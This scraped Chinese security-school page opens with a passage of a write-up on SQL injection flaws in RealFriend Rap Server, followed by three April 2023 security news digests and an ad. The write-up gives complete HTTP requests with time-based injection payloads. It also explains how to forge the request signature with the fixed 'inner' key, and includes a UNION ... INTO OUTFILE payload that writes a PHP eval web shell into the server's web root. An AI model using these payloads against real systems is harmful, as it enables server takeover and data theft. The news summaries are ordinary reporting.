initParams=1&sign=2&key=FarmName'and sleep(5)#
修改了代码 打印出了 SQL 命令
构造实现注入写入文件
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#
注入三ConsoleExternalUploadApi.XGIuploadAuthorizeKeyFile
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10
注入四ConsoleExternalApi.XGIcreateUser
之后的漏洞大抵上都可以描述为同一个漏洞,只是因为参数的不同,传入到不同的位置,在这里仅仅用一个来举例,之后的不再详细进行分析
我们从 ConsoleExternalApi.XGI 进行分析
通过 REQUEST 方法获取到参数
通过接下来的这段代码,我们可以得到如下结论,当 $key 的值为 inner 时,$keyVal 是一个固定值,$sign 的值是 md5($initparams . $keyVal); $initparams 中需要包含 __ 来分割数据,得到每个参数
然后再通过 _ 分割 得到每个参数所对应的值 也就是当传入的值是 a_1__b_2 最后得到的也就是 a=1&b=2
继续向下分析
当传入的 cmd 的值是 createUser 时,进入相对应的分支,构造相对应的语句就可以实现注入。
POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json
{"account":"1'or sleep(5)#",
"userPwd":"1"}
注入五 ConsoleExternalApi.XGIgetUserDetailByAccount
POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058
网络安全日报 2023年04月25日
1、Black Basta勒索组织攻击加拿大出版商
https://www.bleepingcomputer.com/news/security/yellow-pages-canada-confirms-cyber-attack-as-black-basta-leaks-data/ 加拿大目录出版商Yellow Pages Group成立于1908年,拥有并运营YP.ca 和 YellowPages.ca网站,以及 Canada411 在线服务。其已经确认其遭受了网络攻击。Black Basta勒索组织声称对这次入侵活动负责,并在发布了敏感文件和数据。
2、二手企业网络设备因配置信息没有被删除可被利用进行网络攻击
https://www.bleepingcomputer.com/news/security/hackers-can-breach-networks-using-data-on-resold-corporate-routers/ 研究人员发现二手市场上的企业级网络设备隐藏了黑客可以用来破坏企业环境或获取客户信息的敏感数据。研究人员查看了几台使用过的企业级路由器,发现其中大部分被不当擦除然后在线销售。研究人员购买18台二手核心路由器,发现在一半以上工作正常的路由器上仍然可以访问完整的配置数据,这关于原所有者如何设置网络以及其他系统之间的连接的大量详细信息。其中只有五台被正确擦除,只有两台被加固
3、超700亿个敏感文件暴露在不安全的网络服务器上
https://www.helpnetsecurity.com/2023/04/24/critical-cybersecurity-exposures/ 研究人员通过检测发现,在所有检测到的面向互联网的资产中,几乎十分之一 (9%) 具有相关的未修补漏洞。前10个CVE被发现至少有 1200万次未打补丁。超过700亿个文件,包括知识产权和财务信息,在不安全的Web服务器上暴露,安全性无法保证。
4、GitHub 现在允许大规模启用私有漏洞报告
https://www.bleepingcomputer.com/news/security/github-now-allows-enabling-private-vulnerability-reporting-at-scale/ GitHub 宣布私有漏洞报告现已正式发布,并且可以在属于组织的所有存储库上大规模启用。
5、EvilExtractor恶意软件在欧洲和美国激增
https://www.bleepingcomputer.com/news/security/evilextractor-malware-activity-spikes-in-europe-and-the-us/ 研究人员发现,传播EvilExtractor数据盗窃工具的攻击有所增加,该工具用于在欧洲和美国窃取用户的敏感数据。
6、AuKill 工具使用 BYOVD 攻击禁用 EDR 软件
https://securityaffairs.com/145227/malware/aukill-tool-byovd-attack.html Sophos 研究人员报告说,威胁行为者正在使用以前未记录的防御规避工具(称为 AuKill)来禁用端点检测和响应 (EDR) 软件。AuKill 滥用Microsoft 实用程序 Process Explorer 16.32 版使用的过时版本的驱动程序来禁用 EDR 进程。
7、研究人员发布了利用 PaperCut 漏洞的 PoC 代码
https://securityaffairs.com/145215/hacking/papercut-poc-exploit-code.html 威胁参与者正在利用 PaperCut MF/NG 打印管理软件漏洞进行野外攻击,同时研究人员发布了 PoC 漏洞利用代码。
8、8220 Cryptojackers 团伙利用 Log4Shell 漏洞进行挖矿
https://cyware.com/news/8220-gang-of-cryptojackers-exploit-log4shell-to-mint-coins-dc4e6f17 研究人员发现 8220 Gang 利用 Log4Shell 漏洞在韩国能源相关公司的 VMware Horizon 服务器中安装了 CoinMiner。该团伙使用 PowerShell 脚本下载 ScrubCrypt 并通过对注册表项进行编辑来建立持久性。
9、朝鲜黑客使用新的“RustBucket”恶意软件瞄准 Mac 用户
https://www.securityweek.com/north-korean-hackers-target-mac-users-with-new-rustbucket-malware/ 该恶意软件被称为 RustBucket,能够从其命令和控制 (C&C) 服务器获取额外的有效负载,已归因于 APT 参与者 BlueNoroff,据信该组织是 Lazarus 黑客组织的一个子组。
10、Inea ICS 产品中的严重缺陷使工业组织面临远程攻击
https://www.securityweek.com/critical-flaw-in-inea-ics-product-exposes-industrial-organizations-to-remote-attacks 受影响的产品通过蜂窝网络在远程现场设备和控制中心之间提供数据接口。据 CISA 称,该产品在全球范围内用于能源、交通、水和废水等行业。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年04月24日
1、X_Trader供应链攻击影响多国关键基础设施
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain 赛门铁克团队发现X_Trader软件供应链攻击影响的组织比3CX还多,受害者中有两家能源行业的关键基础设施组织,一家在美国,另一家在欧洲,除此之外,另外两个涉及金融交易的组织也遭到破坏。木马化的X_Trader软件是上个月发现的3CX漏洞的原因,由此3CX的软件遭到破坏,许多客户无意中下载了该公司语音和视频通话软件DesktopApp的恶意版本。
2、Fakecalls恶意软件滥用合法签名密钥
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fakecalls-android-malware-abusing-legitimate-signing-key/ McAfee Mobile Research Team发现了 一个Android银行木马程序,该木马程序使用韩国合法应用程序使用的密钥签名。按照设计,Android要求所有应用程序都必须使用密钥签名,这样才能安装或更新。Android银行木马就使用这个合法的签名密钥来绕过基于签名的检测技术。这一威胁已于去年披露给拥有合法密钥的公司,该公司已采取预防措施,确认已更换签名密钥。
3、思科修复解决方案中关键安全漏洞
https://securityaffairs.com/145108/security/industrial-network-director-and-modeling-labs-critical-flaws.html 思科发布了安全更新,以解决其Industrial Network Director 和 Modeling Labs解决方案中的关键安全漏洞。该漏洞跟踪为CVE-2023-20036(CVSS 评分:9.9),攻击者可以利用该漏洞在底层操作系统上以管理权限执行任意命令,并利用这些漏洞注入任意操作系统命令或访问敏感数据。研究发现此漏洞是由于应用于应用程序数据目录的默认文件权限不足
4、健康保险公司 Point32Health 遭受勒索软件攻击
https://securityaffairs.com/145183/cyber-crime/point32health-ransomware-attack.html 非营利性健康保险公司 Point32Health 遭受了勒索软件攻击,并已将系统关闭以应对这一事件。
5、CISA添加了3个漏洞到KEV目录,包括严重的 PaperCut 漏洞
https://thehackernews.com/2023/04/cisa-adds-3-actively-exploited-flaws-to.html 美国网络安全和基础设施安全局 (CISA) 周五根据主动利用的证据,在其已知利用漏洞 ( KEV ) 目录中添加了三个安全漏洞。三个漏洞如下CVE-2023-28432(CVSS 评分 - 7.5)- MinIO 信息泄露漏洞、CVE-2023-27350(CVSS 评分 - 9.8)- PaperCut MF/NG 不当访问控制漏洞、CVE-2023-2136(CVSS 评分 - 待定)- Google Chrome Skia 整数溢
6、黑客利用“明星塌房”、“私密视频”等噱头大肆传播病毒
https://www.freebuf.com/news/364486.html 近段时间以来,随着明星塌房事件密集曝出,有不法分子开始利用“明星塌房”来传播病毒,利用“独家爆料”、“私密视频”、“聊天记录”等噱头来吸引用户下载运行恶意软件。
7、美国国土安全部成立首个人工智能工作组
https://www.freebuf.com/news/364490.html 美国国土安全部(DHS)负责人宣布成立首个人工智能特别工作组,旨在保护国家免受人工智能技术尖端发展(如ChatGPT)造成的安全威胁。
8、与ChatGPT相关的恶意URL呈上升趋势
https://www.anquanke.com/post/id/288427 从2022年11月到2023年4月上旬,与ChatGPT相关的新注册和抢注域名数量每月增长910%。
9、威胁行为者使用 Mimikatz 黑客工具部署 Trigona 勒索软件
https://cybersecuritynews.com/mimikatz-hacking-tool-to-deploy-trigona-ransomware/ Palo Alto Networks 的 Unit42 研究团队最近发现了 Trigona 勒索软件,它使用不常见的技术攻击 Windows,并在尝试加密文件之前使用 Mimikatz 利用工具进行凭证加载、转储、操作和注入。
10、谷歌发布Assured OSS来检测开源组件漏洞
https://cybersecuritynews.com/google-released-assured-oss/ 谷歌云正在为 Java 和 Python 生态系统提供免费的 Assured Open Source Software (Assured OSS) 服务,以应对与依赖开源软件相关的日益严重的危险。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年04月23日
1、Sophos NDR检测到新QakBot C2服务器
https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/ Sophos NDR利用一系列定期重新训练的机器学习模型来应对不断发展的恶意软件家族,这种方法允许Sophos NDR识别在网络深处秘密运行的新恶意软件变种。最近,Sophos NDR检测到两个尚未公开识别的新QakBot服务器。这些服务器被威胁行为者用来管理和控制QakBot感染。
2、攻击者使用旧版WordPress插件入侵网站
https://www.bleepingcomputer.com/news/security/attackers-use-abandoned-wordpress-plugin-to-backdoor-websites/ 攻击者正在使用Eval PHP(一种过时的合法WordPress插件)通过注入隐蔽的后门来破坏网站。Eval PHP是一个旧的WordPress插件,允许站点管理员将PHP代码嵌入到WordPress站点的页面和帖子中,然后在浏览器中打开页面时执行代码。据网站安全公司Sucuri称,使用Eval PHP将恶意代码嵌入看似无害的WordPress页面的趋势在 2023年4月激增
3、PaperCut修复打印管理系统漏洞
https://www.securityweek.com/papercut-warns-of-exploited-vulnerability-in-print-management-solutions/ Papercut 提供了一个称为PaperCut MF/NG的打印管理系统,提供监视和控制功能。该漏洞 CVE-2023-27350(CVSS 评分为 9.8)被描述为PaperCut MF/NG的SetupCompleted类中的不当访问控制问题。成功利用此安全缺陷允许未经身份验证的远程攻击者绕过身份验证并使用系统权限执行任意代码。该漏洞问题影响PaperCut MF 和 NG 8.0及更
4、研究人员发现利用K8s后门攻击集群活动
https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters 研究人员最近发现了有史以来第一个证据,表明攻击者在野利用 Kubernetes (K8s) 基于角色的访问控制 (RBAC) 创建后门。攻击者还部署了DaemonSets来接管和劫持他们攻击的K8s集群的资源。研究表明,该活动正在积极针对至少 60 个野外集群。 研究人员记录并分析了对一个K8s蜜罐的攻击,该蜜罐利用RBAC系统获得持久性。
5、Bumblebee通过木马化安装程序传播
https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads Bumblebee是一种模块化加载程序,过去主要通过网络钓鱼进行分发,用于交付通常与勒索软件部署相关的有效负载。CTU研究人员观察到Bumblebee恶意软件通过木马化安装程序分发,用于Zoom、Cisco AnyConnect、ChatGPT 和 Citrix Workspace 等流行软件。
6、美国多所大学Wiki网站遭到入侵
https://www.bleepingcomputer.com/news/security/university-websites-using-mediawiki-twiki-hacked-to-serve-fortnite-spam/ 研究人员观察到斯坦福大学、麻省理工学院、伯克利大学、麻省大学阿默斯特分校、东北大学、加州理工学院等大学托管的Wiki和文档页面遭到入侵。这些wiki页面是由垃圾邮件发送者上传的,它们引诱读者访问声称提供“免费礼品卡”、“堡垒之夜”和作弊等数字产品的虚假网站。
7、以ChatGPT为主题的诈骗攻击呈上升趋势
https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/ 从2022年11月到2023年4月上旬,与 ChatGPT相关的域的每月注册量增加了910%。在同一时间范围内,我们从DNS安全日志中观察到相关抢注域名增长了17818%。此外每天检测到多达118个与ChatGPT相关的恶意URL,其中包含多个试图冒充OpenAI官方网站的网络钓鱼 URL。
8、美国律师协会 (ABA) 遭遇数据泄露,140 万会员受到影响
https://securityaffairs.com/145125/data-breach/american-bar-association-data-breach.html 美国律师协会 (ABA) 披露了一起数据泄露事件,威胁行为者获得了 1,466,000 名成员的旧凭据。
9、亲俄黑客对 EUROCONTROL 机构发起大规模攻击
https://securityaffairs.com/145114/hacktivism/pro-russia-hackers-ddos-eurocontrol.html 亲俄黑客组织 KillNet 对欧洲的空中交通机构 EUROCONTROL 发起了大规模的 DDoS 攻击。
10、谷歌云平台"GhostToken"漏断,能让恶意软件隐身
https://www.securityweek.com/google-cloud-platform-vulnerability-led-to-stealthy-account-backdoors/ Dark Reading 4 月 21 日消息,谷歌云平台 (GCP) 被曝存在一个安全漏洞,可能允许网络攻击者在受害者的谷歌帐户中隐藏不可删除的恶意应用程序。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

